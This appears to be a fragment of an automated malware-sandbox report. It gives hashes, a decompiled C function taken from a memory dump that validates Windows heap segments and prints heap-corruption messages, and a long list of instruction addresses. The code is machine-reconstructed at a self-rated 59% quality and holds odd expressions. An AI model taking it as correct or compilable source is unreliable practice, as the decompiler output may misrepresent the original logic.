                                                                                                        • Opcode ID: 17c07dd28ecdec2c3bbb3c7c22e7a4da00c9721c3167c9fbf02d2dafb9db1a96
                                                                                                        • Instruction ID: 46c52cbb79ad7e251bb4471637a39644e5724661a046bcb259378d5a788165c6
                                                                                                        • Opcode Fuzzy Hash: 17c07dd28ecdec2c3bbb3c7c22e7a4da00c9721c3167c9fbf02d2dafb9db1a96
                                                                                                        • Instruction Fuzzy Hash: 9761D332562544DFC721EB48D996F6073ECEB04B60B1E89BEF40A5F262C7659C42CF1A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B84AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E00B84AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00ACB150();
						} else {
							E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00ACB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00B7FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00ACB150();
						} else {
							E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00ACB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00ACB150();
									} else {
										E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00ACB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00B7FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00ACB150();
										} else {
											E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00B1D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E00B8A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00AEE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00B8A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00AEE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00AEA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00AEA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00AEBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00B723E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00AC1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                                                        0x00b84af7
                                                                                                        0x00b84afb
                                                                                                        0x00b84afd
                                                                                                        0x00b84b01
                                                                                                        0x00b84b03
                                                                                                        0x00b84b08
                                                                                                        0x00b84b0a
                                                                                                        0x00b84b0f
                                                                                                        0x00b84eb5
                                                                                                        0x00b84eb5
                                                                                                        0x00b84ebb
                                                                                                        0x00b850d5
                                                                                                        0x00b850d8
                                                                                                        0x00b84ff6
                                                                                                        0x00000000
                                                                                                        0x00b84ff6
                                                                                                        0x00b850de
                                                                                                        0x00b850e4
                                                                                                        0x00b850e8
                                                                                                        0x00b85107
                                                                                                        0x00b8510c
                                                                                                        0x00b850ea
                                                                                                        0x00b850ff
                                                                                                        0x00b85104
                                                                                                        0x00b85112
                                                                                                        0x00b85115
                                                                                                        0x00b85118
                                                                                                        0x00b85119
                                                                                                        0x00b850cb
                                                                                                        0x00b850cb
                                                                                                        0x00b850af
                                                                                                        0x00000000
                                                                                                        0x00b850af
                                                                                                        0x00b84ecb
                                                                                                        0x00b850b6
                                                                                                        0x00b850bb
                                                                                                        0x00b84ed1
                                                                                                        0x00b84ee6
                                                                                                        0x00b84eeb
                                                                                                        0x00b850c1
                                                                                                        0x00b850c2
                                                                                                        0x00b850c5
                                                                                                        0x00b850c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84b15
                                                                                                        0x00b84b15
                                                                                                        0x00b84b1c
                                                                                                        0x00b84b1e
                                                                                                        0x00b84b23
                                                                                                        0x00b84b27
                                                                                                        0x00b84b33
                                                                                                        0x00b84b38
                                                                                                        0x00b84b3a
                                                                                                        0x00b84b3c
                                                                                                        0x00b84b41
                                                                                                        0x00b84b41
                                                                                                        0x00b84b3a
                                                                                                        0x00b84b52
                                                                                                        0x00b85045
                                                                                                        0x00b8504b
                                                                                                        0x00b8504f
                                                                                                        0x00b8506e
                                                                                                        0x00b85073
                                                                                                        0x00b85051
                                                                                                        0x00b85066
                                                                                                        0x00b8506b
                                                                                                        0x00b85083
                                                                                                        0x00b85088
                                                                                                        0x00b85088
                                                                                                        0x00b8508a
                                                                                                        0x00b85091
                                                                                                        0x00b85099
                                                                                                        0x00b85099
                                                                                                        0x00b8509d
                                                                                                        0x00b850a7
                                                                                                        0x00b850ad
                                                                                                        0x00b850ad
                                                                                                        0x00b850ad
                                                                                                        0x00000000
                                                                                                        0x00b8509d
                                                                                                        0x00b84b58
                                                                                                        0x00b84b5b
                                                                                                        0x00b84b5e
                                                                                                        0x00b84b63
                                                                                                        0x00b84b66
                                                                                                        0x00b84b69
                                                                                                        0x00b84b6f
                                                                                                        0x00b84be4
                                                                                                        0x00b84bf0
                                                                                                        0x00b84bf2
                                                                                                        0x00b84bf5
                                                                                                        0x00b84dc3
                                                                                                        0x00b84dc6
                                                                                                        0x00b84dc9
                                                                                                        0x00b84dce
                                                                                                        0x00b84dce
                                                                                                        0x00b84dd0
                                                                                                        0x00b84dd0
                                                                                                        0x00b84dd5
                                                                                                        0x00b84def
                                                                                                        0x00b84dd7
                                                                                                        0x00b84de7
                                                                                                        0x00b84de7
                                                                                                        0x00b84df3
                                                                                                        0x00b85001
                                                                                                        0x00b85007
                                                                                                        0x00b8500b
                                                                                                        0x00b8502a
                                                                                                        0x00b8502f
                                                                                                        0x00b8500d
                                                                                                        0x00b85022
                                                                                                        0x00b85027
                                                                                                        0x00b85039
                                                                                                        0x00b8503a
                                                                                                        0x00b8503b
                                                                                                        0x00000000
                                                                                                        0x00b84df9
                                                                                                        0x00b84dfd
                                                                                                        0x00b84e90
                                                                                                        0x00b84e94
                                                                                                        0x00b84e9e
                                                                                                        0x00b84ea4
                                                                                                        0x00b84ea4
                                                                                                        0x00b84ea4
                                                                                                        0x00b84ea6
                                                                                                        0x00b84ea6
                                                                                                        0x00000000
                                                                                                        0x00b84ea6
                                                                                                        0x00b84e03
                                                                                                        0x00b84e08
                                                                                                        0x00b84f88
                                                                                                        0x00b84f92
                                                                                                        0x00b84f99
                                                                                                        0x00b84f9c
                                                                                                        0x00b84fe0
                                                                                                        0x00b84fe4
                                                                                                        0x00b84fee
                                                                                                        0x00b84ff4
                                                                                                        0x00b84ff4
                                                                                                        0x00b84ff4
                                                                                                        0x00000000
                                                                                                        0x00b84fe4
                                                                                                        0x00b84f9e
                                                                                                        0x00b84fa4
                                                                                                        0x00b84fa8
                                                                                                        0x00b84fc7
                                                                                                        0x00b84fcc
                                                                                                        0x00b84faa
                                                                                                        0x00b84fbf
                                                                                                        0x00b84fc4
                                                                                                        0x00b84fd2
                                                                                                        0x00b84fd5
                                                                                                        0x00b84fd6
                                                                                                        0x00b84f34
                                                                                                        0x00b84f34
                                                                                                        0x00000000
                                                                                                        0x00b84f39
                                                                                                        0x00b84e0e
                                                                                                        0x00b84e14
                                                                                                        0x00b84e1b
                                                                                                        0x00b84e25
                                                                                                        0x00b84e2b
                                                                                                        0x00b84e2b
                                                                                                        0x00b84e33
                                                                                                        0x00b84e38
                                                                                                        0x00b84e8a
                                                                                                        0x00b84e8a
                                                                                                        0x00000000
                                                                                                        0x00b84e3a
                                                                                                        0x00b84e3e
                                                                                                        0x00b84e43
                                                                                                        0x00b84e47
                                                                                                        0x00b84e53
                                                                                                        0x00b84e58
                                                                                                        0x00b84e5a
                                                                                                        0x00b84e5c
                                                                                                        0x00b84e61
                                                                                                        0x00b84e61
                                                                                                        0x00b84e5a
                                                                                                        0x00b84e6e
                                                                                                        0x00b84f41
                                                                                                        0x00b84f47
                                                                                                        0x00b84f4b
                                                                                                        0x00b84f6a
                                                                                                        0x00b84f6f
                                                                                                        0x00b84f4d
                                                                                                        0x00b84f62
                                                                                                        0x00b84f67
                                                                                                        0x00b84f7f
                                                                                                        0x00b84f80
                                                                                                        0x00b84f81
                                                                                                        0x00000000
                                                                                                        0x00b84e74
                                                                                                        0x00b84e78
                                                                                                        0x00b84e82
                                                                                                        0x00b84e88
                                                                                                        0x00b84e88
                                                                                                        0x00000000
                                                                                                        0x00b84e78
                                                                                                        0x00b84e6e
                                                                                                        0x00b84e38
                                                                                                        0x00b84df3
                                                                                                        0x00b84bfe
                                                                                                        0x00b84c01
                                                                                                        0x00b84c04
                                                                                                        0x00b84c07
                                                                                                        0x00b84c09
                                                                                                        0x00b84c0c
                                                                                                        0x00b84c0e
                                                                                                        0x00b84c0e
                                                                                                        0x00b84c11
                                                                                                        0x00b84c11
                                                                                                        0x00b84c0c
                                                                                                        0x00b84c14
                                                                                                        0x00b84c17
                                                                                                        0x00b84dae
                                                                                                        0x00b84db2
                                                                                                        0x00b84db7
                                                                                                        0x00b84dba
                                                                                                        0x00b84dbd
                                                                                                        0x00b84ef1
                                                                                                        0x00b84ef7
                                                                                                        0x00b84efb
                                                                                                        0x00b84f1a
                                                                                                        0x00b84f1f
                                                                                                        0x00b84efd
                                                                                                        0x00b84f12
                                                                                                        0x00b84f17
                                                                                                        0x00b84f2b
                                                                                                        0x00b84f2b
                                                                                                        0x00b84f2d
                                                                                                        0x00b84f2e
                                                                                                        0x00b84f2f
                                                                                                        0x00000000
                                                                                                        0x00b84f2f
                                                                                                        0x00000000
                                                                                                        0x00b84c1d
                                                                                                        0x00b84c1d
                                                                                                        0x00b84c20
                                                                                                        0x00b84c23
                                                                                                        0x00b84c26
                                                                                                        0x00b84c29
                                                                                                        0x00b84c2c
                                                                                                        0x00b84c2e
                                                                                                        0x00b84d91
                                                                                                        0x00b84d91
                                                                                                        0x00b84d92
                                                                                                        0x00b84d97
                                                                                                        0x00b84d9e
                                                                                                        0x00000000
                                                                                                        0x00b84d9e
                                                                                                        0x00b84c34
                                                                                                        0x00b84c37
                                                                                                        0x00b84c39
                                                                                                        0x00b84c3c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84c45
                                                                                                        0x00b84c48
                                                                                                        0x00b84c4e
                                                                                                        0x00b84c50
                                                                                                        0x00b84c78
                                                                                                        0x00b84c78
                                                                                                        0x00b84c7b
                                                                                                        0x00b84c7d
                                                                                                        0x00b84c80
                                                                                                        0x00b84c84
                                                                                                        0x00b84cad
                                                                                                        0x00b84cad
                                                                                                        0x00b84cb0
                                                                                                        0x00b84cb8
                                                                                                        0x00b84cbb
                                                                                                        0x00b84cbe
                                                                                                        0x00b84cc1
                                                                                                        0x00b84cc7
                                                                                                        0x00b84cdc
                                                                                                        0x00b84cc9
                                                                                                        0x00b84cd2
                                                                                                        0x00b84cd4
                                                                                                        0x00b84cd4
                                                                                                        0x00b84cde
                                                                                                        0x00b84ce0
                                                                                                        0x00b84d13
                                                                                                        0x00b84d13
                                                                                                        0x00b84d16
                                                                                                        0x00b84d18
                                                                                                        0x00b84d29
                                                                                                        0x00b84d2a
                                                                                                        0x00b84d2c
                                                                                                        0x00b84d34
                                                                                                        0x00b84d1a
                                                                                                        0x00b84d1a
                                                                                                        0x00b84d1a
                                                                                                        0x00b84d1d
                                                                                                        0x00b84d1f
                                                                                                        0x00b84d22
                                                                                                        0x00b84d24
                                                                                                        0x00b84d24
                                                                                                        0x00b84d3c
                                                                                                        0x00b84d3f
                                                                                                        0x00b84d45
                                                                                                        0x00b84d47
                                                                                                        0x00b84d6c
                                                                                                        0x00b84d6c
                                                                                                        0x00b84d70
                                                                                                        0x00b84d7e
                                                                                                        0x00b84d84
                                                                                                        0x00b84d84
                                                                                                        0x00000000
                                                                                                        0x00b84d49
                                                                                                        0x00b84d49
                                                                                                        0x00b84d56
                                                                                                        0x00b84d56
                                                                                                        0x00b84d59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84d4e
                                                                                                        0x00b84d50
                                                                                                        0x00b84d52
                                                                                                        0x00b84d8e
                                                                                                        0x00b84d5d
                                                                                                        0x00b84d5f
                                                                                                        0x00b84d67
                                                                                                        0x00000000
                                                                                                        0x00b84d67
                                                                                                        0x00b84d54
                                                                                                        0x00b84d54
                                                                                                        0x00b84d5b
                                                                                                        0x00000000
                                                                                                        0x00b84d5b
                                                                                                        0x00b84ce2
                                                                                                        0x00b84ce2
                                                                                                        0x00b84ce5
                                                                                                        0x00b84ce5
                                                                                                        0x00b84ce7
                                                                                                        0x00b84cfb
                                                                                                        0x00b84ce9
                                                                                                        0x00b84ce9
                                                                                                        0x00b84cec
                                                                                                        0x00b84cef
                                                                                                        0x00b84cf1
                                                                                                        0x00b84cf3
                                                                                                        0x00b84cf3
                                                                                                        0x00b84cf3
                                                                                                        0x00b84cf6
                                                                                                        0x00b84cf6
                                                                                                        0x00b84d02
                                                                                                        0x00b84d05
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84d07
                                                                                                        0x00b84d0f
                                                                                                        0x00b84d11
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84d11
                                                                                                        0x00000000
                                                                                                        0x00b84ce5
                                                                                                        0x00b84ce0
                                                                                                        0x00b84c8a
                                                                                                        0x00b84c8f
                                                                                                        0x00b84c91
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84c9d
                                                                                                        0x00000000
                                                                                                        0x00b84c9d
                                                                                                        0x00b84c52
                                                                                                        0x00b84c5f
                                                                                                        0x00b84c5f
                                                                                                        0x00b84c62
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84c57
                                                                                                        0x00b84c59
                                                                                                        0x00b84c5b
                                                                                                        0x00b84caa
                                                                                                        0x00b84c66
                                                                                                        0x00b84c68
                                                                                                        0x00b84c70
                                                                                                        0x00b84c75
                                                                                                        0x00000000
                                                                                                        0x00b84c75
                                                                                                        0x00b84c5d
                                                                                                        0x00b84c5d
                                                                                                        0x00b84c64
                                                                                                        0x00000000
                                                                                                        0x00b84c64
                                                                                                        0x00b84c17
                                                                                                        0x00b84b75
                                                                                                        0x00b84bc4
                                                                                                        0x00b84bc8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84bd9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84b77
                                                                                                        0x00b84b7a
                                                                                                        0x00b84b8c
                                                                                                        0x00b84b7c
                                                                                                        0x00b84b7e
                                                                                                        0x00b84b83
                                                                                                        0x00b84b86
                                                                                                        0x00b84b86
                                                                                                        0x00b84b90
                                                                                                        0x00b84b93
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84b95
                                                                                                        0x00b84bab
                                                                                                        0x00b84bb0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84bb2
                                                                                                        0x00b84bb9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84bbb
                                                                                                        0x00b84bbe
                                                                                                        0x00b84bc1
                                                                                                        0x00b84bc1
                                                                                                        0x00000000
                                                                                                        0x00b84bc1
                                                                                                        0x00b84b97
                                                                                                        0x00b84ba4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b84ba6
                                                                                                        0x00000000
                                                                                                        0x00b84ba6
                                                                                                        0x00b84ea9
                                                                                                        0x00b84ea9
                                                                                                        0x00b84eb2
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
